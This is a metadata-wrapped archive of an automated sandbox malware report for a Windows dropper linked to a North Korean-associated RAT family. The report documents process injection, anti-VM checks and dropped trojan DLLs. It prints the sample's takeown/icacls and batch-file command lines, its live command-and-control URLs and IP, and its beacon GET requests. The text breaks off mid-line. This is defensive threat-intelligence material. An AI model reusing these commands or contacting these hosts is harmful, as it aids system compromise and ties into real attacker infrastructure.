{
	"id": "a91ebb50-b8f1-469d-b32a-5a58ce06eab1",
	"created_at": "2026-04-06T00:07:03.576359Z",
	"updated_at": "2026-04-10T03:34:54.481202Z",
	"deleted_at": null,
	"sha1_hash": "a1e53aa284db83d833dd6e87d72502b4e9c192f8",
	"title": "Free Automated Malware Analysis Service - powered by Falcon Sandbox",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 166462,
	"plain_text": "Free Automated Malware Analysis Service - powered by Falcon Sandbox\r\nArchived: 2026-04-02 10:36:53 UTC\r\nIncident Response\r\nRisk Assessment\r\nPersistence\r\nGrants permissions using icacls (DACL modification)\r\nInjects into explorer\r\nInjects into remote processes\r\nSpawns a lot of processes\r\nTries to take ownership of files\r\nWrites data to a remote process\r\nNetwork Behavior\r\nContacts 1 domain and 1 host.\r\nIndicators\r\nEnvironment Awareness\r\nThe input sample contains a known anti-VM trick\r\ndetails\r\nFound VM detection artifact \"VMware trick\" in \"c9b65b764985dfd7a11d3faf599c56b8.exe.bin\"\r\n(Offset: 2230)\r\nsource\r\nBinary File\r\nrelevance\r\n5/10\r\nExternal Systems\r\nDetected Suricata Alert\r\ndetails\r\nDetected alert \"ETPRO TROJAN Win32/Spy.Keydoor.D Checkin\" (SID: 2805200, Rev: 4, Severity: 1)\r\ncategorized as \"A Network Trojan was detected\" (Backdoor, ransomware, trojans, etc.)\r\nDetected alert \"CrowdStrike SILENT CHOLLIMA HTTP/IRC Bot/RAT and Concealment Troy GET\r\nRequest\" (SID: 181303201, Rev: 20130830, Severity: 1) categorized as \"A Network Trojan was\r\ndetected\"\r\nsource\r\nSuricata Alerts\r\nrelevance\r\n10/10\r\nFound an IP/URL artifact that was identified as malicious by a significant amount of reputation engines\r\ndetails\r\n3/67 reputation engines marked \"http://lawbookcenter.co.kr/shop/temp/goods_list.php\" as malicious\r\n(4% detection rate)\r\n3/64 reputation engines marked \"http://solarshade.co.kr/eml/goods_list_ok.php\" as malicious (4%\r\ndetection rate)\r\nsource\r\nExternal System\r\nrelevance\r\n10/10\r\nSample was identified as malicious by a large number of Antivirus engines\r\ndetails\r\n46/66 Antivirus vendors marked sample as 
malicious (69% detection rate)\r\nsource\r\nExternal System\r\nrelevance\r\n10/10\r\nSample was identified as malicious by at least one Antivirus engine\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 1 of 25\n\ndetails\r\n46/66 Antivirus vendors marked sample as malicious (69% detection rate)\r\nsource\r\nExternal System\r\nrelevance\r\n8/10\r\nGeneral\r\nThe analysis extracted a file that was identified as malicious\r\ndetails\r\n51/65 Antivirus vendors marked dropped file \"w7e2219.tmp\" as malicious (classified as\r\n\"Gen:ExplorerHijack.Hu4@aWQ@tkgO\" with 78% detection rate)\r\n37/50 Antivirus vendors marked dropped file \"~ER24B7.tmp\" as malicious (classified as\r\n\"Gen:Trojan.Heur.LP\" with 74% detection rate)\r\n43/53 Antivirus vendors marked dropped file \"~ER1AFA.tmp\" as malicious (classified as\r\n\"Trojan.Generic\" with 81% detection rate)\r\nsource\r\nBinary File\r\nrelevance\r\n10/10\r\nThe analysis spawned a process that was identified as malicious\r\ndetails\r\n43/53 Antivirus vendors marked spawned process \"~ER1AFA.tmp\" (PID: 2080) as malicious\r\n(classified as \"Trojan.Generic\" with 81% detection rate)\r\nsource\r\nMonitored Target\r\nrelevance\r\n10/10\r\nInstallation/Persistance\r\nAllocates virtual memory in a remote process\r\ndetails\r\n\"\u003cInput Sample\u003e\" allocated memory in \"%TEMP%\\ud.bat\"\r\n\"~ER1AFA.tmp\" allocated memory in \"%TEMP%\\w7e2219.tmp\"\r\n\"sysprep.exe\" allocated memory in\r\n\"\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\"\r\nsource\r\nAPI Call\r\nrelevance\r\n7/10\r\nInjects into explorer\r\ndetails\r\nInjected into \"explorer.exe\" (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n5/10\r\nInjects into remote processes\r\ndetails\r\nInjected into \"explorer.exe\" at 2018-6-12.01:21:31.015 (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n6/10\r\nWrites data to a remote 
process\r\ndetails\r\n\"\u003cInput Sample\u003e\" wrote 32 bytes to a remote process \"%TEMP%\\~ER1AFA.tmp\" (Handle: 44)\r\n\"\u003cInput Sample\u003e\" wrote 52 bytes to a remote process\r\n\"C:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\~ER1AFA.tmp\" (Handle: 44)\r\n\"\u003cInput Sample\u003e\" wrote 4 bytes to a remote process\r\n\"C:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\~ER1AFA.tmp\" (Handle: 44)\r\n\"~ER1AFA.tmp\" wrote 96 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 56 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 28 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 84 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 80 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 2 of 25\n\n\"~ER1AFA.tmp\" wrote 88 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 24 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 20 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 13 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 15 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 12 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 17 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 16 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 134 bytes to a remote process \"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"~ER1AFA.tmp\" wrote 1104 bytes to a remote process 
\"C:\\Windows\\explorer.exe\" (Handle: 132)\r\n\"explorer.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sysprep\\sysprep.exe\"\r\n(Handle: 3072)\r\n\"explorer.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sysprep\\sysprep.exe\"\r\n(Handle: 3072)\r\n\"explorer.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sysprep\\sysprep.exe\"\r\n(Handle: 3072)\r\n\"sysprep.exe\" wrote 32 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n(Handle: 312)\r\n\"sysprep.exe\" wrote 52 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n(Handle: 312)\r\n\"sysprep.exe\" wrote 4 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n(Handle: 312)\r\n\"sysprep.exe\" wrote 8 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n(Handle: 312)\r\n\"cmd.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\takeown.exe\" (Handle: 84)\r\n\"cmd.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\takeown.exe\" (Handle: 84)\r\n\"cmd.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\takeown.exe\" (Handle: 84)\r\n\"cmd.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\icacls.exe\" (Handle: 80)\r\n\"cmd.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\icacls.exe\" (Handle: 80)\r\n\"cmd.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\icacls.exe\" (Handle: 80)\r\n\"iexplore.exe\" wrote 32 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n(Handle: 1164)\r\n\"iexplore.exe\" wrote 52 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n(Handle: 1164)\r\n\"iexplore.exe\" wrote 4 bytes to a remote process \"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n(Handle: 1164)\r\nsource\r\nAPI Call\r\nrelevance\r\n6/10\r\nPattern Matching\r\nYARA signature 
match\r\ndetails\r\nYARA signature \"Codoso_Gh0st_1\" classified file \"~ER1AFA.tmp\" as \"apt,codoso,plugx\" based on\r\nindicators:\r\n\"45006c00650076006100740069006f006e003a00410064006d0069006e006900730074007200610074006f00720021006e006500770\r\n(Reference: https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, Author:\r\nFlorian Roth)\r\nInternal YARA signature matched on process \"~ER1AFA.tmp\"\r\nInternal YARA signature matched on file \"all.bstring\"\r\nsource\r\nYARA Signature\r\nrelevance\r\n10/10\r\nSystem Security\r\nModifies the access control lists of files\r\ndetails\r\nProcess \"icacls.exe\" with commandline \"icacls \"%WINDIR%\\system32\\msimg64.dll\" /grant\r\nadministrators:F\" (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n5/10\r\nUnusual Characteristics\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 3 of 25\n\nSpawns a lot of processes\r\ndetails\r\nSpawned process \"\u003cInput Sample\u003e\" (Show Process)\r\nSpawned process \"~ER1AFA.tmp\" (Show Process)\r\nSpawned process \"sysprep.exe\" with commandline \"\"%WINDIR%\\System32\\sysprep\\sysprep.exe\" \"\"\r\n(Show Process), Spawned process \"cmd.exe\" with commandline \"/c takeown /f\r\n\"%WINDIR%\\system32\\msimg64.dll\" \u0026\u0026 icacls \"%WINDIR%\\system32\\msimg64.dll\" /grant\r\nadministrators:F\" (Show Process), Spawned process \"takeown.exe\" with commandline \"takeown /f\r\n\"%WINDIR%\\system32\\msimg64.dll\"\" (Show Process), Spawned process \"icacls.exe\" with\r\ncommandline \"icacls \"%WINDIR%\\system32\\msimg64.dll\" /grant administrators:F\" (Show Process),\r\nSpawned process \"cmd.exe\" with commandline \"cmd /c %TEMP%\\\\ud.bat\" (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n8/10\r\nHiding 3 Malicious Indicators\r\nAll indicators are available only in the private webservice or standalone version\r\nAnti-Detection/Stealthyness\r\nContains 
ability to open/control a service\r\nQueries process information\r\ndetails\r\n\"~ER1AFA.tmp\" queried SystemProcessInformation at 00013784-00002080-00000105-8311148578\r\nsource\r\nAPI Call\r\nrelevance\r\n4/10\r\nAnti-Reverse Engineering\r\nPE file has unusual entropy sections\r\ndetails\r\nUPX1 with unusual entropies 7.9309190833\r\nsource\r\nStatic Parser\r\nrelevance\r\n10/10\r\nPE file is packed with UPX\r\ndetails\r\n\"c9b65b764985dfd7a11d3faf599c56b8.exe.bin\" has a section named \"UPX0\"\r\n\"c9b65b764985dfd7a11d3faf599c56b8.exe.bin\" has a section named \"UPX1\"\r\nsource\r\nStatic Parser\r\nrelevance\r\n10/10\r\nCryptographic Related\r\nFound a cryptographic related string\r\ndetails\r\n\"DES\" (Indicator: \"des\"; File: \"00013784-00002080.00000000.14285.00995000.00000002.mdmp\")\r\nsource\r\nFile/Memory\r\nrelevance\r\n10/10\r\nEnvironment Awareness\r\nContains ability to query CPU information\r\nExternal Systems\r\nFound an IP/URL artifact that was identified as malicious by at least one reputation engine\r\ndetails\r\n3/67 reputation engines marked \"http://lawbookcenter.co.kr/shop/temp/goods_list.php\" as malicious\r\n(4% detection rate)\r\n3/64 reputation engines marked \"http://solarshade.co.kr/eml/goods_list_ok.php\" as malicious (4%\r\ndetection rate)\r\n1/67 reputation engines marked \"http://lawbookcenter.co.kr\" as malicious (1% detection rate)\r\nsource\r\nExternal System\r\nrelevance\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 4 of 25\n\n10/10\r\nGeneral\r\nContains ability to find and load resources of a specific module\r\ndetails\r\nFindResourceW@KERNEL32.DLL from ~ER1AFA.tmp (PID: 2080) (Show Stream)\r\nsource\r\nHybrid Analysis Technology\r\nrelevance\r\n1/10\r\nInstallation/Persistance\r\nContains ability to create a remote thread (often used for process injection)\r\ndetails\r\nCreateRemoteThread@KERNEL32.DLL from ~ER1AFA.tmp (PID: 2080) (Show 
Stream)\r\nsource\r\nHybrid Analysis Technology\r\nrelevance\r\n8/10\r\nContains ability to write to a remote process\r\ndetails\r\nWriteProcessMemory@KERNEL32.DLL from ~ER1AFA.tmp (PID: 2080) (Show Stream)\r\nWriteProcessMemory@KERNEL32.dll (Show Stream)\r\nWriteProcessMemory@KERNEL32.dll (Show Stream)\r\nsource\r\nHybrid Analysis Technology\r\nrelevance\r\n8/10\r\nCreates new processes\r\ndetails\r\n\"\u003cInput Sample\u003e\" is creating a new process (Name: \"%TEMP%\\~ER1AFA.tmp\", Handle: 44)\r\n\"\u003cInput Sample\u003e\" is creating a new process\r\n\"\u003cInput Sample\u003e\" is creating a new process (Name: \"%WINDIR%\\System32\\cmd.exe\", Handle: 52)\r\n\"explorer.exe\" is creating a new process (Name:\r\n\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\", Handle: 3072)\r\n\"sysprep.exe\" is creating a new process (Name: \"%WINDIR%\\System32\\cmd.exe\", Handle: 304)\r\n\"sysprep.exe\" is creating a new process (Name: \"%PROGRAMFILES%\\Internet\r\nExplorer\\iexplore.exe\", Handle: 312)\r\n\"cmd.exe\" is creating a new process (Name: \"%WINDIR%\\System32\\takeown.exe\", Handle: 84)\r\n\"cmd.exe\" is creating a new process (Name: \"%WINDIR%\\System32\\icacls.exe\", Handle: 80)\r\n\"iexplore.exe\" is creating a new process (Name: \"C:\\Program Files\\Internet Explorer\\iexplore.exe\",\r\nHandle: 1164)\r\nsource\r\nAPI Call\r\nrelevance\r\n8/10\r\nDrops executable files\r\ndetails\r\n\"w7e2219.tmp\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"\r\n\"~ER24B7.tmp\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"\r\n\"~ER1AFA.tmp\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"\r\nsource\r\nBinary File\r\nrelevance\r\n10/10\r\nSpyware/Information Retrieval\r\nContains ability to enumerate processes/modules/threads\r\ndetails\r\nCreateToolhelp32Snapshot@KERNEL32.DLL from ~ER1AFA.tmp (PID: 2080) (Show Stream)\r\nsource\r\nHybrid Analysis Technology\r\nrelevance\r\n5/10\r\nSystem 
Destruction\r\nMarks file for deletion\r\ndetails\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 5 of 25\n\n\"C:\\c9b65b764985dfd7a11d3faf599c56b8.exe\" marked \"%TEMP%\\~ER1AFA.tmp\" for deletion\r\n\"%TEMP%\\~ER1AFA.tmp\" marked \"%TEMP%\\w7e2219.tmp\" for deletion\r\n\"%WINDIR%\\System32\\sysprep\\sysprep.exe\" marked \"%TEMP%\\~ER24B7.tmp\" for deletion\r\nsource\r\nAPI Call\r\nrelevance\r\n10/10\r\nOpens file with deletion access rights\r\ndetails\r\n\"\u003cInput Sample\u003e\" opened \"%TEMP%\\~ER1AFA.tmp\" with delete access\r\n\"~ER1AFA.tmp\" opened \"%TEMP%\\w7e2219.tmp\" with delete access\r\n\"sysprep.exe\" opened \"%TEMP%\\~ER24B7.tmp\" with delete access\r\nsource\r\nAPI Call\r\nrelevance\r\n7/10\r\nSystem Security\r\nGrants permissions using icacls (DACL modification)\r\ndetails\r\nProcess \"icacls.exe\" with commandline \"icacls \"%WINDIR%\\system32\\msimg64.dll\" /grant\r\nadministrators:F\" (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n3/10\r\nTries to take ownership of files\r\ndetails\r\nProcess \"cmd.exe\" with commandline \"/c takeown /f \"%WINDIR%\\system32\\msimg64.dll\" \u0026\u0026 icacls\r\n\"%WINDIR%\\system32\\msimg64.dll\" /grant administrators:F\" (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n5/10\r\nUnusual Characteristics\r\nCRC value set in PE header does not match actual value\r\ndetails\r\n\"w7e2219.tmp\" claimed CRC 564747 while the actual is CRC 354185\r\n\"~ER24B7.tmp\" claimed CRC 289298 while the actual is CRC 564747\r\n\"~ER1AFA.tmp\" claimed CRC 1105664 while the actual is CRC 289298\r\nsource\r\nStatic Parser\r\nrelevance\r\n10/10\r\nEntrypoint in PE header is within an uncommon section\r\ndetails\r\n\"c9b65b764985dfd7a11d3faf599c56b8.exe.bin\" has an entrypoint in section \"UPX1\"\r\nsource\r\nStatic Parser\r\nrelevance\r\n10/10\r\nImports suspicious 
APIs\r\ndetails\r\nRegCloseKey\r\nVirtualProtect\r\nGetProcAddress\r\nVirtualAlloc\r\nLoadLibraryA\r\nOpenProcessToken\r\nStartServiceA\r\nRegCreateKeyExA\r\nRegOpenKeyExA\r\nRegEnumKeyExA\r\nGetTempPathA\r\nWriteFile\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 6 of 25\n\nWriteProcessMemory\r\nGetModuleFileNameW\r\nCopyFileA\r\nGetModuleFileNameA\r\nUnhandledExceptionFilter\r\nGetModuleHandleA\r\nTerminateProcess\r\nCreateToolhelp32Snapshot\r\nLoadLibraryW\r\nGetTickCount\r\nGetVersionExA\r\nProcess32Next\r\nCreateRemoteThread\r\nGetStartupInfoA\r\nProcess32First\r\nDeleteFileA\r\nGetStartupInfoW\r\nGetTempFileNameA\r\nCreateFileW\r\nIsDebuggerPresent\r\nCreateFileA\r\nVirtualAllocEx\r\nLockResource\r\nGetCommandLineA\r\nGetModuleHandleW\r\nCreateProcessA\r\nSleep\r\nFindResourceA\r\nCryptEncrypt\r\nCreateProcessAsUserA\r\nRegDeleteValueA\r\nCreateFileMappingA\r\nGetFileAttributesA\r\nGetDriveTypeA\r\nOpenFileMappingA\r\nCreateThread\r\nExitThread\r\nGetFileSize\r\nOpenProcess\r\nCreateDirectoryA\r\nFindFirstFileA\r\nGetComputerNameA\r\nFindNextFileA\r\nMapViewOfFile\r\nGetCommandLineW\r\nDeleteFileW\r\nProcess32FirstW\r\nGetTempFileNameW\r\nProcess32NextW\r\nGetTempPathW\r\nFindResourceW\r\nVirtualProtectEx\r\nsource\r\nStatic Parser\r\nrelevance\r\n1/10\r\nHiding 1 Suspicious Indicators\r\nAll indicators are available only in the private webservice or standalone version\r\nAnti-Reverse Engineering\r\nContains ability to register a top-level exception handler (often used as anti-debugging trick)\r\nPE file contains zero-size sections\r\ndetails\r\nRaw size of \"UPX0\" is zero\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 7 of 25\n\nsource\r\nStatic Parser\r\nrelevance\r\n10/10\r\nEnvironment Awareness\r\nContains ability to query machine time\r\nContains ability to query the machine 
version\r\ndetails\r\nGetVersionExA@KERNEL32.dll (Show Stream)\r\nGetVersionExA@KERNEL32.dll (Show Stream)\r\nsource\r\nHybrid Analysis Technology\r\nrelevance\r\n1/10\r\nContains ability to query the system locale\r\nMakes a code branch decision directly after an API that is environment aware\r\ndetails\r\nFound API call GetLocalTime@KERNEL32.dll directly followed by \"cmp esi, dword ptr\r\n[10038A64h]\" and \"jnl 10001CD0h\" (Show Stream)\r\nFound API call GetVersionExA@KERNEL32.dll directly followed by \"cmp dword ptr [ebp-00000094h], 06h\" and \"inc eax\" (Show Stream)\r\nFound API call GetVersionExA@KERNEL32.dll directly followed by \"cmp dword ptr [ebp-00000094h], 06h\" and \"inc eax\" (Show Stream)\r\nsource\r\nHybrid Analysis Technology\r\nrelevance\r\n10/10\r\nReads the active computer name\r\ndetails\r\n\"sysprep.exe\" (Path:\r\n\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\";\r\nKey: \"COMPUTERNAME\")\r\n\"takeown.exe\" (Path:\r\n\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\";\r\nKey: \"COMPUTERNAME\")\r\n\"icacls.exe\" (Path:\r\n\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\";\r\nKey: \"COMPUTERNAME\")\r\nsource\r\nRegistry Access\r\nrelevance\r\n5/10\r\nTries to sleep for a long time (more than two minutes)\r\ndetails\r\n\"iexplore.exe\" sleeping for \"01320000\" milliseconds\r\nsource\r\nAPI Call\r\nrelevance\r\n10/10\r\nGeneral\r\nContacts domains\r\ndetails\r\n\"solarshade.co.kr\"\r\nsource\r\nNetwork Traffic\r\nrelevance\r\n1/10\r\nContacts server\r\ndetails\r\n\"221.143.46.43:80\"\r\nsource\r\nNetwork Traffic\r\nrelevance\r\n1/10\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 8 of 25\n\nContains PDB pathways\r\ndetails\r\n\"o.pdbm1V\"\r\n\"%SAMPLEDIR%\\1Mission\\Team_Project\\[2012.6 
~]\\HTTP\r\nTroy\\HttpDr0pper\\x64\\Release\\3PayloadDll.pdb\"\r\n\"%SAMPLEDIR%\\1Mission\\Team_Project\\[2012.6 ~]\\HTTP\r\nTroy\\HttpDr0pper\\Win32\\Release\\HttpSecurityProvider.pdb\"\r\n\"%SAMPLEDIR%\\1Mission\\Team_Project\\[2012.6 ~]\\HTTP\r\nTroy\\HttpDr0pper\\x64\\Release\\HttpSecurityProvider.pdb\"\r\n\"%SAMPLEDIR%\\1Mission\\Team_Project\\[2012.6 ~]\\HTTP\r\nTroy\\HttpDr0pper\\Win32\\Release\\3PayloadDll.pdb\"\r\nsource\r\nFile/Memory\r\nrelevance\r\n1/10\r\nCreates a writable file in a temporary directory\r\ndetails\r\n\"\u003cInput Sample\u003e\" created file \"%TEMP%\\~ER1AFA.tmp\"\r\n\"\u003cInput Sample\u003e\" created file \"%TEMP%\\ud.bat\"\r\n\"~ER1AFA.tmp\" created file \"%TEMP%\\w7e2219.tmp\"\r\n\"sysprep.exe\" created file \"%TEMP%\\~ER24B7.tmp\"\r\n\"iexplore.exe\" created file \"%TEMP%\\~DFF452498869DECF72.TMP\"\r\n\"iexplore.exe\" created file \"%TEMP%\\~DFF818A5A707F378C8.TMP\"\r\n\"iexplore.exe\" created file \"%TEMP%\\~13785.tmp\"\r\nsource\r\nAPI Call\r\nrelevance\r\n1/10\r\nCreates mutants\r\ndetails\r\n\"\\Sessions\\1\\BaseNamedObjects\\{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3}\"\r\n\"{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3}\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\SYSPREP-APP-5c9fbbd0-ee0e-11d2-9a21-0000f81edacc\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Global\\WdsSetupLogInit\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Global\\SetupLog\"\r\n\"Global\\SetupLog\"\r\n\"SYSPREP-APP-5c9fbbd0-ee0e-11d2-9a21-0000f81edacc\"\r\n\"Global\\WdsSetupLogInit\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Local\\_!MSFTHISTORY!_\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!ffqm9td!appdata!local!microsoft!windows!temporary\r\ninternet 
files!content.ie5!\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!ffqm9td!appdata!roaming!microsoft!windows!cookies!\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!ffqm9td!appdata!local!microsoft!windows!history!history.ie5!\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Local\\WininetStartupMutex\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Local\\WininetConnectionMutex\"\r\n\"\\Sessions\\1\\BaseNamedObjects\\Local\\WininetProxyRegistryMutex\"\r\nsource\r\nCreated Mutant\r\nrelevance\r\n3/10\r\nGETs files from a webserver\r\ndetails\r\n\"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=3740962\u0026sc=b984cf5bcbf0f38f3d136d1f97103a91\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\n\"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=5265868\u0026sc=2e03e977aa881c76f7df783789a1e026\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\n\"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=6906788\u0026sc=412dd86c4ba55fde5144cf03627da841\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\nsource\r\nNetwork Traffic\r\nrelevance\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 9 of 25\n\n5/10\r\nLaunches a browser\r\ndetails\r\nLaunches browser \"iexplore.exe\" (Show Process)\r\nLaunches browser \"iexplore.exe\" (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n3/10\r\nProcess launched with changed environment\r\ndetails\r\nProcess \"explorer.exe\" (Show Process) was launched with new environment variables:\r\n\"SESSIONNAME=\"Console\"\"\r\nProcess \"explorer.exe\" (Show Process) was launched with modified environment variables: \"Path\"\r\nProcess \"explorer.exe\" (Show Process) was launched with missing environment variables: \"PROMPT\"\r\nProcess \"takeown.exe\" (Show Process) was 
launched with new environment variables:\r\n\"PROMPT=\"$P$G\"\"\r\nProcess \"iexplore.exe\" (Show Process) was launched with missing environment variables: \"PROMPT\"\r\nProcess \"cmd.exe\" (Show Process) was launched with new environment variables:\r\n\"PROMPT=\"$P$G\"\"\r\nProcess \"cmd.exe\" (Show Process) was launched with modified environment variables: \"Path\"\r\nProcess \"cmd.exe\" (Show Process) was launched with missing environment variables:\r\n\"SESSIONNAME\"\r\nsource\r\nMonitored Target\r\nrelevance\r\n10/10\r\nRuns shell commands\r\ndetails\r\n\"/c takeown /f \"%WINDIR%\\system32\\msimg64.dll\" \u0026\u0026 icacls\r\n\"%WINDIR%\\system32\\msimg64.dll\" /grant administrators:F\" on 2018-6-12.01:21:31.576\r\n\"cmd /c %TEMP%\\\\ud.bat\" on 2018-6-12.01:22:54.322\r\nsource\r\nMonitored Target\r\nrelevance\r\n5/10\r\nSpawns new processes\r\ndetails\r\nSpawned process \"~ER1AFA.tmp\" (Show Process)\r\nSpawned process \"sysprep.exe\" with commandline \"\"%WINDIR%\\System32\\sysprep\\sysprep.exe\" \"\"\r\n(Show Process), Spawned process \"cmd.exe\" with commandline \"/c takeown /f\r\n\"%WINDIR%\\system32\\msimg64.dll\" \u0026\u0026 icacls \"%WINDIR%\\system32\\msimg64.dll\" /grant\r\nadministrators:F\" (Show Process), Spawned process \"iexplore.exe\" with commandline\r\n\"www.google.com\" (Show Process), Spawned process \"takeown.exe\" with commandline \"takeown /f\r\n\"%WINDIR%\\system32\\msimg64.dll\"\" (Show Process), Spawned process \"icacls.exe\" with\r\ncommandline \"icacls \"%WINDIR%\\system32\\msimg64.dll\" /grant administrators:F\" (Show Process),\r\nSpawned process \"iexplore.exe\" with commandline \"SCODEF:2096 CREDAT:79873\" (Show Process),\r\nSpawned process \"cmd.exe\" with commandline \"cmd /c %TEMP%\\\\ud.bat\" (Show Process)\r\nsource\r\nMonitored Target\r\nrelevance\r\n3/10\r\nTries to GET non-existent files from a webserver\r\ndetails\r\n\"GET 
